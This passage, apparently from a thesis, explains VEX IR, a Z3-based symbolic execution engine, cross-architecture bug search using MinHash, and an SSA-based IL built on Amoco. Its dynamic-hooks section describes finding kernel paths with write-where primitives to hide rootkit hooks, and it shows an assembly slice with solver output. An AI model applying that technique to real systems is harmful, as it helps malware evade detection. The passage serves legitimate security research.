the DARPA Cyber Grand Challenge, is based on BIL. With pyvex [181], Python bindings to LibVEX 1 were first introduced, enabling fast prototyping and making VEX accessible for static analysis. Based on pyvex, the creators later introduced a binary analysis framework called Angr [182]. Angr's strength comes with its flexible and interactive nature, making it an accessible and easy entrance into the field of symbolic execution. Its engine has a rich API and is scripted through Python. Any interaction with the IL is abstracted away.
However, Angr’s debut came after we made our first moves with pyvex. Rather than reinventing the wheel, we decided to use VEX. It was our first choice to build a binary framework to apply our ideas. However, we also learned over time that it is not an optimal choice for our use cases.

2.1 The VEX Intermediate Language

So far, we have treated the notions of an IL and an IR interchangeably. In general, an IR is a data structure that represents the program. The CFG, for instance, can be seen as such an IR. An IL, as the name suggests, is a language into which the original program is translated. This definition allows an IL to serve as an IR, but not vice versa.

1Library that implements the IR

VEX translates each machine instruction into a set of IR instructions, so-called statements (IRStmt). To easily grasp the idea, a visualization of these instructions is given in Figure 2.2; each statement has the form:

IRStmt = IRExpr

Each statement IRStmt stands on the left side of an assignment. Changes in the machine state, like memory stores and register assignments, are realized and modeled through statements. On the right side of the assignment we have expressions (IRExpr), which do not change the state of the machine. They represent computations, e.g., arithmetic operations or memory loads. These memory loads are typically assigned to a temporary variable and modeled by a WrTmp statement. Memory stores, register assignments, and the assignment of temporary variables each represent a specific type of assignment. VEX distinguishes between these types through statements. Thus, each statement tells us what kind of assignment or state change we are confronted with. Note that the notion of assignments is for visualization purposes; they are internally incorporated within the statement data structures of VEX. Analogous to the notion of basic blocks, a deterministic sequence of VEX-IR statements forms a single-entry, multiple-exit IR Super Block (IRSB). Figure 2.1 shows an excerpt of the grammar taken from [147]. The IR is well documented in libvex_ir.h2. Each temporary variable is in static single assignment (SSA) form. This property ensures that each variable is defined exactly once. SSA plays an important role for us and we discuss it in more detail in Section 2.3.2. However, the SSA code that we obtain statically from VEX has basic block granularity, i.e., the property only holds within the boundaries of an IRSB. We summarize the essential elements of the VEX IR as follows:

• IRExpr: Data processing expressions

– Get: loads the value of a register that is specified by an index in a shadow table.
– Load: loads the value at a given address.
– RdTmp: has the value of an IRTemp (a temporary variable).
– {Un, Bin, Tri, Q}op: expressions that receive 1 to 4 expressions, respectively. Arithmetic or logical operations are processed.

2VEX/pub/libvex_ir.h

IRStmt ::= IMark of Addr64 * Int * UChar | Put of Int * IRExpr | WrTmp of IRTemp * IRExpr | Store of IREndness * IRExpr * IRExpr | Exit of IRExpr * IRConst * IRJumpKind * Int | ...

IRExpr ::= Get of int * IRType | RdTmp of IRTemp | Qop of IROp * IRExpr * IRExpr * IRExpr * IRExpr | Triop of IROp * IRExpr * IRExpr * IRExpr | Binop of IROp * IRExpr * IRExpr | Unop of IROp * IRExpr | Load of IREndness * IRType * IRExpr | Const of IRConst | ...

IREndness ::= LittleEndian | BigEndian

IRJumpKind ::= Ijk_Boring | Ijk_Call | Ijk_Ret | ... | Ijk_Trap | Ijk_Sys_syscall | ... | Ijk_Sys_sysenter

Figure 2.1: Excerpt of the VEX grammar taken from [147].

• IRStmt: IR instructions which can change the state of the machine

– Put: writes the value of an IRExpr to a register specified by an index in the shadow table.
– Store: writes the value of an IRExpr to memory.
– WrTmp: assigns an IRExpr to an IRTemp.
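To make the statement/expression split concrete, the grammar excerpt can be mirrored with a few plain data types. The following is an illustrative sketch in Python; the class and field names are modeled on the grammar above, not on the actual data structures in libvex_ir.h or on pyvex's API:

```python
from dataclasses import dataclass
from typing import Union

# Simplified, hypothetical mirror of the IRExpr/IRStmt split.
@dataclass
class Get:                 # IRExpr: read a register via its shadow-table offset
    offset: int

@dataclass
class RdTmp:               # IRExpr: read a temporary variable
    tmp: int

@dataclass
class Const:               # IRExpr: constant value
    value: int

@dataclass
class Binop:               # IRExpr: binary operation on two sub-expressions
    op: str
    left: "IRExpr"
    right: "IRExpr"

@dataclass
class Load:                # IRExpr: memory load from a computed address
    addr: "IRExpr"

IRExpr = Union[Get, RdTmp, Const, Binop, Load]

@dataclass
class WrTmp:               # IRStmt: assign an expression to a temporary
    tmp: int
    data: IRExpr

@dataclass
class Put:                 # IRStmt: write an expression to a register
    offset: int
    data: IRExpr

# t1 = Add32(t2, 0x18:I32) from Figure 2.2, encoded as a WrTmp statement:
stmt = WrTmp(tmp=1, data=Binop("Add32", RdTmp(2), Const(0x18)))
```

The state-changing constructs (WrTmp, Put) are statements, while everything on their right-hand side is a side-effect-free expression tree, which is exactly the property the handlers in the next section rely on.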

In Figure 2.2 the VEX code for the x86 instruction mov eax, [esp+18h] is given. As we can see, this single instruction is translated into several IR instructions which semantically do what the x86 instruction does. The first line uses the GET expression to read the value of register esp and writes it into a temporary variable. These temporary variables can also be seen as pseudo registers. The number 24 is an index that VEX uses for lookups in a shadow table [152]. Each register has a unique number assigned to it in this shadow table; in this case, the number 24 stands for the esp register. Registers eax and eip have the numbers 8 and 68, respectively. These numbers are also used in the PUT statement. The second line adds 0x18 to t2, which holds the value of esp. What VEX does here is to make the address to be loaded from available in the temporary register t1. The next IR instruction loads from this address and writes the result to t3. Line 4 writes the loaded value into eax. The last line sets the instruction pointer to the next instruction. Many implicit operations that the x86 CPU performs are expressed explicitly through the VEX IR. In particular, address computations as well as load and store operations on memory cells are made explicit.

1 t2 = GET:I32(24)
2 t1 = Add32(t2,0x18:I32)
3 t3 = LDle:I32(t1)
4 PUT(8) = t3
5 PUT(68) = 0x8048434:I32

Figure 2.2: IRSB for mov eax, [esp+18h].

2.2 Symbolic Execution: Steps with VEX

Similar to what is postulated by the UNIX philosophy, we pursue the goal of implementing a system that serves a single purpose and seeks to do it right: checking for satisfiable paths. To ease our task, we assume that a single path is given. This comes with the advantage that we do not have to handle the path explosion problem [177], one of the major problems that symbolic execution is susceptible to. As we will see in the next sections, this simple design choice helps us to solve some interesting problems which were incorporated in [207, 158].

Design

We present the design of our system in Figure 2.3. Given a trace of basic block addresses, we first gather all opcodes of each basic block by using IDA Pro in batch mode, load the binary, and start an rpyc server which exposes the Python API of IDA Pro 1 . These functionalities are also incorporated by the authors of pyvex in a tool called IDALink 3. Each basic block is lifted to a VEX IRSB, which we process statement by statement 2 . Each statement is passed to an IRStmt-handler 3 which dispatches on its type 4 , extracts the VEX expressions, and passes each expression to an IRExpr-handler 5 . This handler processes the expressions along their abstract syntax trees (AST) and transforms them into expressions that can be

3https://github.com/zardus/idalink

Figure 2.3: Overview of our architecture for symbolic execution and evaluation.

processed by an SMT solver, which is Z3 4 in our design 6 . Through its API, Z3 formulas can easily be transformed into S-Expressions (symbolic expressions), which are Lisp-like expressions that are particularly convenient to parse. The formulas are additionally simplified before the IRExpr-handler passes them back to the IRStmt-handler 7 . The IRStmt-handler logs memory store and load events as well as CPU register events. On the statement level we then have all the information we need to build/update a state 8 . With state, we refer to the CPU and memory state, each of them updated in terms of Z3 expressions. Each block of the trace, passed in the order of its execution within the trace, updates the memory and register states and yields the foundation of the symbolic execution. At branch sites we pass the path conditions to Z3 and check for satisfiability. We now sketch the notion of an abstract environment (AbsEnv) to formally represent a symbolic state of current register and memory values. The whole memory in our system is represented as one global Z3 array that maps bitvectors to bitvectors. An AbsEnv maps each register and memory access to a Z3 formula over bitvectors: 4https://github.com/Z3Prover/z3

Figure 2.4: Execution using abstract environments.

VEX-IL | Execution: AbsEnv → AbsEnv
t2 = Get(24) | e = AbsEnv[esp]; AbsEnv[t2] = e
t1 = Add32(t2, 0x18:I32) | e = AbsEnv[t2] = esp; e′ = e + 0x18 = esp + 0x18; AbsEnv[t1] = e′
t3 = LDle:I32(t1) | e = AbsEnv[t1]; e′ = µ[t1] = µ[esp + 0x18]; AbsEnv[t3] = e′
PUT(8) = t3 | e = AbsEnv[t3]; AbsEnv[eax] = e
PUT(68) = 0x8048434:I32 | AbsEnv[eip] = 0x8048434

AbsEnv = (Z3Expr → Z3Expr) × (µ : Z3Expr → Z3Expr)

Note that temporary variables in VEX are also treated as registers. A symbolic execution of each IR statement is interpreted in terms of Z3 expressions and the AbsEnv gives us the current state of the execution. Figure 2.4 shows the interpreted execution of the instruction mov eax, [esp+18h] which we translated into VEX-IR as shown in Figure 2.2. To get a better understanding of the VEX-IR to Z3 routine, let’s look at the statement in the second line of Figure 2.2. Here we are dealing with a WrTmp statement. Linked to this statement we have the Add32(t2,0x18:I32) expression of type Binop which further incorporates t2 of type RdTmp and 0x18 of type Const. The IRExpr-handler traverses the AST of these expressions and builds two Z3 bitvectors and a recipe for the IRStmt-handler. This recipe tells the handler how to cope with the expressions. In this case it tells the handler to add the two bitvectors. The statement handler then updates the abstract environment as shown in Figure 2.4. More specifically, the handler evaluates each temporary variable in the present execution context. The semantics are faithful to the assembly language. Our architecture builds the foundation for:

• Cross-Architecture Bug Search in Binary Executables [158]

• Dynamic Hooks [207]
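The interpreted execution of Figure 2.4 can be replayed with a toy interpreter. The sketch below is illustrative only: it substitutes plain 32-bit Python integers for Z3 bitvector formulas, and the tuple-based statement encoding and the concrete esp and memory values are our own assumptions, not part of VEX or our handlers:

```python
MASK = 0xFFFFFFFF  # truncate results to 32-bit values

def step(absenv, mem, stmt):
    """Interpret one statement over an abstract environment.

    absenv maps register/temporary names to 32-bit values and mem maps
    addresses to values -- concrete stand-ins for Z3 bitvector formulas.
    """
    kind = stmt[0]
    if kind == "Get":                 # t = GET:I32(reg)
        _, tmp, reg = stmt
        absenv[tmp] = absenv[reg]
    elif kind == "Add32":             # t = Add32(src, const)
        _, tmp, src, const = stmt
        absenv[tmp] = (absenv[src] + const) & MASK
    elif kind == "Load":              # t = LDle:I32(addr_tmp)
        _, tmp, addr_tmp = stmt
        absenv[tmp] = mem[absenv[addr_tmp]]
    elif kind == "Put":               # PUT(reg) = tmp
        _, reg, tmp = stmt
        absenv[reg] = absenv[tmp]
    elif kind == "PutConst":          # PUT(reg) = const
        _, reg, const = stmt
        absenv[reg] = const

# Replaying the IRSB of Figure 2.2 for mov eax, [esp+18h]
# (esp and the memory cell hold arbitrary example values):
absenv = {"esp": 0xBFFF0000}
mem = {0xBFFF0018: 0xDEADBEEF}        # value at [esp+0x18]
irsb = [
    ("Get", "t2", "esp"),             # t2 = GET:I32(24)
    ("Add32", "t1", "t2", 0x18),      # t1 = Add32(t2, 0x18)
    ("Load", "t3", "t1"),             # t3 = LDle:I32(t1)
    ("Put", "eax", "t3"),             # PUT(8) = t3
    ("PutConst", "eip", 0x8048434),   # PUT(68) = 0x8048434
]
for s in irsb:
    step(absenv, mem, s)
# absenv["eax"] now holds the loaded value, absenv["eip"] the next address.
```

In the real engine each of these updates produces a Z3 bitvector expression instead of a concrete value, so the final environment describes the state symbolically rather than for one fixed input.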

In the following we describe its role in more detail.

2.2.1 Cross-Architecture Basic Block Semantics

Software on embedded devices is usually closed-source and implemented in an unsafe language. A study by VDC Research indicates that the use of third-party software is not only driven by release pressures but is also becoming common practice [83]. Furthermore, vendors use the same code base to compile firmware images for different devices with varying CPU architectures. In recent years, open source software has gained popularity in this regard and is a major source of third-party code re-use. As a consequence, the software gets adapted, might not have the latest patches, and receives no maintenance on the device. This scenario is not uncommon and has a weakness number assigned to it, CWE-1104, which stands for "Use of Unmaintained Third Party Components" [62]. It gains traction particularly due to the increasing number of devices induced by the IoT revolution. Note that much of this software, open source components or not, is compiled to binaries that have stripped symbols and contain no information about function names or types. This is the landscape that inspired us to pursue the following question: if several firmware images re-use the same code that happens to have a security bug, how can we re-find those bugs, not only in different images but also in different images across architectures? In other words, if software has a bug in its ARM image, can we find it in other software on another architecture? We defined the process of re-finding with a similarity-based approach. The problem to solve is to formulate a bug signature and find similarities to it in other binaries. As we know, binary code is challenging: some of the program semantics can be lost during compilation, as well as function names, comments, data structures, and data types.
For a similarity-based approach, and especially with respect to cross-architecture similarity, binaries raise the bar because code can be compiled with different optimization levels, with different compilers, and for different operating systems and architectures. Thus, a reasonable way to tackle this problem has to involve semantics. Semantic similarity captures the effects of the code on the processor and memory states. The next question that arises is how to efficiently capture these semantics. It is here where the engine we presented in the previous section plays its strengths. To make a cross-architecture comparison, we need a common ground. This common ground is the IR stage which translates each assembly instruction into VEX and from VEX into a formula. Each formula is updated with respect to the local execution scope of the basic block. In other words, we execute the basic block as described in the previous section, and after a basic block is processed, the register and memory context is reset. The context is extracted as a sequence of formulas, each represented by easy-to-parse S-Expressions. In Figure 2.5 we present two basic blocks for x86 and ARMv7, respectively, both of which represent the same lines of code in busybox 1.20. The upper row shows a verbose disassembly of IDA Pro; the row below the disassembly shows each block represented by a sequence of S-Expressions. The formulas describe how the input variables influence the output. This representation is a semantic summary of the basic block. For instance, based on the ARM code, we take the value of register R12 into consideration. The formula for R12 is: (= R12 (bvadd #xfffffff0 (select MEM (bvadd #x0000052c SP))))

With MEM we have one global Z3 array that represents the memory, and we explicitly indicate its access here. The formula stands for -16 + MEM[0x52c + SP], which summarizes the course of actions on R12 in the local scope of the basic block. These actions are performed at 0x00086DA8 and 0x00086DB4 in the ARM code. At 0x00086DCC the value of R12 is written to the stack. This instruction is represented by the last four lines of the S-Expression block. The value of R12 is directly inlined in this assignment. These three instructions are equivalent to the x86 code at 0x080D051C. While we saw the nature of a load-and-store architecture in the ARM code, here we have one of the complex instructions that x86 allows: arithmetic with memory operands. The following formula represents the value stored at the corresponding stack address: (store MEM_BB (bvadd ESP #x0000052c) (bvadd #xfffffff0 (select MEM (bvadd #x0000052c ESP))))

The formula stands for -16 + MEM[0x52c + ESP], whose value is stored to MEM_BB[0x52c + ESP]. With MEM_BB, we explicitly indicate that the store happens within the scope of the current block, which makes it easier to parse memory stores as outputs in the formula; otherwise it is equivalent to MEM. Both formulas have one output, R12/MEM_BB, and two inputs, ESP/SP and the memory dereference. These formulas already show high similarity. Since we are only interested in the final value of the dereference, we treat the formula as if it has one input only, the memory value. This also applies to nested memory expressions, in which case we flatten them to one input. The basic block formulas build the foundation for the next steps, which we briefly summarize.
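Such summaries are deliberately easy to consume downstream: a minimal S-Expression reader suffices to turn a formula like the R12 summary above into a nested list. The following is our own illustration, independent of the Z3 API:

```python
def parse_sexpr(text):
    """Parse a single S-Expression into nested Python lists of tokens."""
    # Pad parentheses so a plain split() tokenizes the input.
    tokens = text.replace("(", " ( ").replace(")", " ) ").split()

    def read(pos):
        if tokens[pos] == "(":
            node, pos = [], pos + 1
            while tokens[pos] != ")":
                child, pos = read(pos)
                node.append(child)
            return node, pos + 1          # skip the closing ")"
        return tokens[pos], pos + 1       # atom

    tree, _ = read(0)
    return tree

# The R12 summary from the ARM block above:
tree = parse_sexpr(
    "(= R12 (bvadd #xfffffff0 (select MEM (bvadd #x0000052c SP))))")
```

Walking the resulting tree is then enough to pick out the output variable (the second element of the top-level `=`) and the inputs (register atoms and `select MEM` sub-terms).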

The next steps focus on the semantics of each basic block. The semantics are derived by sampling, i.e., taking values from a given range, substituting them for the inputs in the formula, and storing the input/output pairs. The standard metric of similarity is the Jaccard index. To quickly get estimates of the Jaccard index, the resulting input and output pairs are hashed by locality-sensitive hashing, more specifically, MinHash. The MinHash algorithm uses a variety of hash functions, repeatedly applies them to each element of a set, and takes the minimum hash value. The probability that two minimum hashes are equal equals the Jaccard index, and with an increasing number of hash functions we get an estimate that is close to the index. One of the enhancements of this technique proposed in our joint work [158] involves grouping the formulas by their inputs, sampling them, and hashing their I/O pairs. This is the essence of what is called Multi-MinHash. It has the benefit that formulas with fewer inputs are not underrepresented. Once the hashes are computed, we have the foundation to approach cross-architecture similarity matching: a bug signature that can span several basic blocks or a single block runs through the pipeline we have presented, along with the binary to be matched against. The target binary can be of any architecture for which we support the transformation to the common IR stage. A greedy algorithm then moves from one best match to another along the control flow of signature and target, ranking the matches by their similarity score. For the details and the empirical study on how this is successfully achieved, especially with respect to Multi-MinHash and k-MinHash, we refer the reader to [158]. In fact, this work is the first to tackle the problem of cross-architecture bug search.
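The MinHash idea can be sketched in a few lines. This is our own illustration of the general technique, not the implementation from [158]; the seeded SHA-256 hash family, the signature length, and the example sets are arbitrary choices:

```python
import hashlib

def minhash_signature(items, k=128):
    """Keep one minimum per seeded hash function; items is a set of strings."""
    sig = []
    for seed in range(k):
        sig.append(min(
            int.from_bytes(
                hashlib.sha256(f"{seed}:{x}".encode()).digest()[:8], "big")
            for x in items))
    return sig

def estimated_jaccard(sig_a, sig_b):
    """Fraction of agreeing positions approximates |A ∩ B| / |A ∪ B|."""
    return sum(a == b for a, b in zip(sig_a, sig_b)) / len(sig_a)

# Two overlapping sets standing in for sampled I/O pairs of two blocks;
# their true Jaccard index is 50/150 ≈ 0.33.
a = {f"io-pair-{i}" for i in range(100)}
b = {f"io-pair-{i}" for i in range(50, 150)}
est = estimated_jaccard(minhash_signature(a), minhash_signature(b))
```

With k = 128 hash functions, the estimate concentrates around the true index; increasing k tightens the estimate at the cost of more hashing, which is exactly the trade-off exploited when comparing many basic block pairs.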

At this point we want to refer back to our example: the example we have chosen here also shows the shortcomings of the basic block granularity. In the ARM code of Figure 2.5 we see at 0x00086DAC that 0xFFFF is loaded into R4. We cannot see any instruction in the x86 code that does a similar computation. In fact, the computation is done in a basic block that is one block away from the current one. The compiler has reordered the instructions for better performance. As a consequence, the basic block similarity drops. However, as long as such a reordering does not affect many formulas, and considering that most of the other formulas are strong witnesses that contribute to the similarity, the drop does not have a big impact on the overall similarity ranking.

Figure 2.5: Basic blocks (ARMv7 vs. x86) representing the same lines of code in function inflate_unzip_internal and their corresponding summaries in S-Expression form.

2.2.2 Path Extraction for Dynamic Hooks

Diverting control flow via hooks is a well-known and established technique, applied not only by malicious code but also for monitoring purposes. The techniques have a long history and undergo a cat-and-mouse game between malware authors and detection systems. This project, driven by the work of Sebastian Vogl, introduced a new technique for hiding hooks which is referred to as dynamic hooking. Here, a hook is placed within non-control data. The dynamic aspect comes with the actual execution of certain paths that trigger the hook. The idea is to manipulate data structures in such a way that a hook is triggered whenever legitimate functions operate on the data structure. For instance, it is possible to alter a list data structure in such a way that a function that follows a program path to delete an element from the list writes to an arbitrary location, such as the return address. Thus, when the function returns, the hook gets triggered. In [207] we have shown how effectively such hooks can be applied to hide rootkits in the kernel. Both Windows and Linux use the Global Segment Register (GS) to store important global variables. In Linux 3.8 64-bit, the task_struct resides at GS:0xc740. The idea is to find both source and sink registers that originate from a fixed address or from the region pointed to by the GS register, in which case we achieve a write-where primitive. A path that leads us to such a primitive is considered to be exploitable by a dynamic hook. We refer the reader to [207] for the details. In what follows, we describe the path validation and extraction process achieved by the engine we presented in the previous section.

For the path extraction, our engine is extended with a backward slicer. Static program slicing is a well known technique, originally proposed by Mark Weiser [211]. The key idea is to extract all instructions in the program that may affect the value

of sink variables. Starting from a potential 8-byte write of the form mov [regx],

regy, the backward slicer traverses the CFG backwards for both regx and regy, respectively. When a call node is hit, it pushes the current context onto a stack and follows the call. Usually the control flow graph (CFG) is annotated with use-def chains. A use-def chain is a data structure that maps a single use to all definition that reach the use. By traversing these chains, i.e., processing each use-def chain of each definition and repeating this process, each address is put into the slice. Precise slicing usually incorporates a data structure called control dependence graph (CDG) which is used to account for guarding expressions, i.e, expression that guard a branch. The data structure is particularly useful for revealing dependencies that are not data dependent. We present the foundation on how to build these graphs in the course 22 2.3. A suitable IL of the next sections of this chapter. However, the approach we follow here refrains from using the CDG. This is due to the fact that we construct full paths from a sink back to its source where we run through the guards as well. The sole purpose for the slicer is basically to get the data dependency between the sink and the source. The computation approach that we followed has an on demand character, where we only work on the CFG. While traversing the CFG backwards, we check each basic block locally for use-def chains. At the same time we also keep track of the paths we are following. A threshold of 500 basic blocks limits the path length. We process the CFG until we hit a GS register through the slice or stop at a stack location. Each path is a potential trigger of a dynamic hook. The paths that are generated by the slicer need to undergo a validation process through symbolic execution. In Figure 2.6 we show the slice and the full path that we extracted and which leads into the source, gs:188h. The slicer begins at [r8+70h], rdx, finds the data dependency to the source we are seeking and constructs the path to it. 
This path is validated for satisfiability by our symbolic execution engine; it validates the slice and constructs a formula for the paths to be taken. The symbolic execution engine reveals, in particular, how the values are controlled. For instance, the rdx at 0x1400c0bfe is controlled through a multilevel chain of memory dereferences starting at the source, gs:188h. The engine also reveals that the jump is not taken and that the condition for it to proceed is that the value at rcx + 0x118 equals 0. The path is satisfiable, and in [207], Vogl et al. show how it is used to trigger dynamic hooks. For more information on how many paths we generated and solved for the purpose of dynamic hooks, please refer to our collaborative work [207].
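The on-demand flavor of the slicer can be mimicked with a small Python sketch over the straight-line code of Figure 2.6. The names (Instr, backward_slice) are illustrative and not the framework's actual API, and the sketch covers only a single basic block: we walk the instruction list backwards from the sink, resolve each tracked operand to its reaching definition, and add that definition's own uses to the tracked set until only sources (here, the GS-relative loads) remain.

```python
from collections import namedtuple

# Illustrative three-address rendering of the slice in Figure 2.6:
# each instruction defines 'dst' from the operands in 'srcs'.
Instr = namedtuple("Instr", "addr dst srcs")

def backward_slice(instrs, sink_addr, sink_ops):
    """Walk backwards from the sink; the first definition of a tracked
    operand met in reverse order is its reaching definition."""
    tracked = set(sink_ops)
    slice_addrs = set()
    for ins in reversed([i for i in instrs if i.addr < sink_addr]):
        if ins.dst in tracked:
            slice_addrs.add(ins.addr)
            tracked.discard(ins.dst)
            tracked.update(ins.srcs)   # now chase the definition's own uses
    return slice_addrs, tracked        # leftovers in 'tracked' are sources

prog = [
    Instr(0x1400c0bd0, "rax", ["gs:188h"]),   # mov rax, gs:188h
    Instr(0x1400c0bd9, "rcx", ["rax"]),       # mov rcx, [rax+70h]
    Instr(0x1400c0be7, "rax", ["gs:20h"]),    # mov rax, gs:20h
    Instr(0x1400c0bf0, "r8",  ["rax"]),       # mov r8, [rax-180h]
    Instr(0x1400c0bf7, "rdx", ["rcx"]),       # mov rdx, [rcx+108h]
]
# sink: mov [r8+70h], rdx at 0x1400c0bfe
addrs, sources = backward_slice(prog, 0x1400c0bfe, ["r8", "rdx"])
```

Note how the second definition of rax correctly shadows the first one during the reverse walk, so r8 is resolved against gs:20h while rcx is resolved against gs:188h, matching the two sources in the figure.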

2.3 A suitable IL

At the beginning of this chapter we spoke about the role of a proper IL. There is a variety of such intermediate languages. Each comes with its strengths and proper use cases. Some systems avoid lifting binary code and run the code on bare metal, trading portability for performance. Qsym [216] and Triton [174] are such systems, which are based on dynamic binary translation. The choice of an IL can not only affect the execution speed, but also the complexity of SMT queries. This insight is evaluated in a recent work by Poeplau et al. [159]. For us, execution speed and queries play a secondary role when it comes to an IL. Our primary purpose is to ease program analysis and be close to bare metal. This is motivated by the experience we made with McSema [68], a work that aims to lift binaries to LLVM. It is seductive to have access to the immense amount of passes

----slice-----
0x00000001400c0bd0 mov rax, gs:188h
0x00000001400c0bd9 mov rcx, [rax+70h]
0x00000001400c0be7 mov rax, gs:20h
0x00000001400c0bf0 mov r8, [rax-180h]
0x00000001400c0bf7 mov rdx, [rcx+108h]
0x00000001400c0bfe mov [r8+70h], rdx

---FULLPATH-----
0x00000001400c0bd0: mov rax, gs:188h
0x00000001400c0bd9: mov rcx, [rax+70h]
0x00000001400c0bdd: cmp qword ptr [rcx+118h], 0
0x00000001400c0be5: jz short locret_1400C0C17

0x00000001400c0be7: mov rax, gs:20h
0x00000001400c0bf0: mov r8, [rax-180h]
0x00000001400c0bf7: mov rdx, [rcx+108h]
0x00000001400c0bfe: mov [r8+70h], rdx

Symbolic Execution Output:

[*] Jump Condition in: BB_0x1400c0bd0
[*] MEM[RCX + 0x118] - 0x0 == 0x0
[*] Jump is not taken

CPUCONTEXT/CONTROLLEDREGISTERS
RCX -> MEM[MEM[0x188 + GS] + 0x70]
RAX -> MEM[0x188 + GS]
------

PATH END in BB_0x1400c0be7

CPUCONTEXT/CONTROLLEDREGISTERS
R8  -> MEM[MEM[0x20 + GS] + 0xfffffffffffffe80]
RCX -> MEM[MEM[0x188 + GS] + 0x70]
RDX -> MEM[MEM[MEM[0x188 + GS] + 0x70] + 0x108]
RAX -> MEM[0x20 + GS]

LASTMEMWRITE:
SRC  -> RDX
DEST -> R8 + 0x70
------OUTPUT-FOR-PARSER------

[*] Jump Cond -> MEM[RCX + 0x118] - 0x0 == 0x0
[*] Simplified Cond -> MEM[0x118 + RCX] == 0x0

Figure 2.6: Slice/Path extraction and output of Symbolic Execution.

that come with LLVM. However, many of them are designed for source code analysis and use specific metadata that come with the LLVM toolchain. We experienced that we lose track of the instructions of the binary. One of our demands is to pinpoint the instructions that caused a bug. With an IL that is close to the original assembly language we see this achieved conveniently. In fact, the BAP IL (BIL) [30] follows this approach. Furthermore, it eases the debugging and the triaging process. Another desire for us is the incremental nature, i.e., being able to extend the IL without breaking analysis procedures. A new expression introduced into the IL should interact transparently with the present set of expressions. We summarize our wishlist for an IL as follows:

• Eased lifting and support to add new architectures.

• IL extensions: manipulate statements and expressions; support to integrate new ones into the system. The new expressions have to interact transparently with the present set of statements/expressions.

• Serialization: being able to access the whole AST of statements and serialize specific parts of it.

• Make static program analysis approachable.

None of the above points is supported by VEX naturally. The comparison to VEX is, in fact, unfair, since it is not designed for static program analysis. Implementing the functionalities comes with cumbersome technical challenges. However, it is worth mentioning that some of them are, by now, solved by contributions to the Angr project. To our surprise, we found a framework that fulfills most of our demands in a natural way. Our choice fell on Amoco [198]. It fulfills our wishlist and gives us an instrument to build on. We extended its IL with expressions to support static single assignment (SSA), recognize custom opcodes, and made further extensions on the expression side to fit our needs. In the course of this work we will cover all of our extensions. Figure 2.7 shows the grammar of the IL built on top of Amoco. The terminals are denoted as reg and cst, where reg is a sequence defined by [a-zA-Z0-9_]+ and cst is an integer. The Slice expressions represent different slices of each expression. For instance, in x86-64 the 32-bit general purpose register ebx can be represented as a slice of rbx:

ebx = rbx[0:32]

It gives us an instrument to define overlaps. For instance, let's assume that the lower 4 bytes of the x86-64 register rbx are the lower 4 bytes of rdx, and the higher 4 bytes are the higher 4 bytes of rax. In fact, Amoco has a compound-expression defined for this. We basically have rbx as a compound of the lower half of rdx and the upper half of rax, which is modelled by:

rbx = rdx[0:32] <+> rax[32:64]

The <+> operator stitches (concatenates) both operands into a larger operand. For a Slice-expression, the lifter has to explicitly check that i ≥ 0, j ≤ register_size, and j > i hold, where i and j are the lower and upper bound, respectively. The TST-expression models an if-then-else expression which uses the ternary operator ?:. The left-hand side of a statement is either a register or a memory expression. This is enforced by the lifter. Memory expressions on the left-hand side are considered as memory stores, and accordingly each memory expression on the right-hand side is a memory load. The semantics are faithful to the assembly language.
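The slice and compound semantics can be mirrored with plain bit arithmetic. The following is a minimal sketch under the assumption of Python-style half-open bounds [i:j); the helper names are our own, not Amoco's API:

```python
def slice_bits(value, i, j):
    """Expression[i:j]: bits i (inclusive) up to j (exclusive), j > i >= 0."""
    assert 0 <= i < j
    return (value >> i) & ((1 << (j - i)) - 1)

def compound(lo, lo_bits, hi):
    """lo <+> hi: stitch both operands, lo occupying the low lo_bits bits."""
    return (hi << lo_bits) | lo

rbx = 0x1122334455667788
ebx = slice_bits(rbx, 0, 32)    # the ebx = rbx[0:32] overlap -> 0x55667788

# rbx as a compound of the low half of rdx and the high half of rax
rdx = 0x00000000AAAAAAAA
rax = 0xBBBBBBBB00000000
new_rbx = compound(slice_bits(rdx, 0, 32), 32, slice_bits(rax, 32, 64))
```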

Program    ::= Statement {, Statement}
Statement  ::= reg ← Expression | Mem ← Expression
Expression ::= reg | cst | Ptr | Mem | Phi | Slice | TST | BinOp | (Expression) | BOOL
Mem        ::= Msize Ptr
Ptr        ::= reg + cst | cst
Slice      ::= Expression[i:j]
RegList    ::= reg {, reg}
Phi        ::= φ( RegList )
TST        ::= BOOL ? Expression : Expression
BOOL       ::= Expression REL Expression
Compound   ::= Slice <+> Slice
BinOp      ::= Expression OPERATOR Expression
REL        ::= < | > | <= | >= | == | ∧

Figure 2.7: SymIL Grammar.

Mentalese is divided into a frontend and a backend. The frontend utilizes Amoco to lift the binary into SymIL and transforms it into our IR. Figure 2.8 illustrates the translation of an ARM assembly block into SymIL, which is in SSA form. In the next chapter we cover this translation process and our adaption of SSA.

———————0x584e4———————-          ———————0x584e4———————-
ldr r3, [r0,#0]                 r3_4 ← M32(r0)
str r3, [r0,#4]                 M32(r0+4) ← r3_4
mov r3, 0x0                     r3_5 ← 0
str r3, [r0,#0]                 M32(r0) ← r3_5

Figure 2.8: ARM Code to SymIL.

2.3.1 Dataflow Essentials

The execution of a program can be seen as a sequence of state transformations from one program point to another. We differentiate between program points before a statement and after a statement is executed. These points are referred to as the input and output state, respectively. A body of techniques that helps us to reason about state transformations with respect to information flow inside the program comes with dataflow analysis. Dataflow analysis is concerned with summarizing how these input and output states change over all possible paths in the control flow graph of the program. For the sake of simplicity we refer to a program point before a statement as the program point before we enter a basic block, and likewise we refer to a program point after a statement as a point after the basic block is executed. We denote these points by IN[BB] and OUT[BB], respectively. The basic schema involves transfer functions which describe how information is passed from one program point to another. We clarify this concept with one of the fundamentals in dataflow analysis known as reaching definitions. As the name suggests, reaching definitions reason about variable definitions that may reach a program point along a path. Usually the direction of the information flow plays a role and is reflected by the transfer function. In our case we have a forward flow.

We define two sets genBB and killBB, where genBB is a set of tuples of the form (variable, address) in which a variable is defined in BB at some address. From the standpoint of the basic block BB, each definition in BB invalidates (kills) all other definitions of the same variable. These definitions, in the form of (variable, address) tuples, are elements of the killBB set.

With the definition of genBB and killBB we can now define the transfer function:

fBB(x) = genBB ∪ (x − killBB) (2.1)

where x is the set of definitions that reach BB. In our case x = IN[BB]. Recall that with IN[BB] we refer to the point before entering basic block BB, i.e., where all information from ancestor blocks basically meets. The equation says

that definitions generated in BB are joined with definitions that reach BB and are not killed. These are the values that are passed from BB to its successors. To build a reaching definition analysis we need:

OUT[BB] = fBB(IN[BB]) (2.2)

IN[BB] = ∪p∈pred(BB) OUT[p] (2.3)

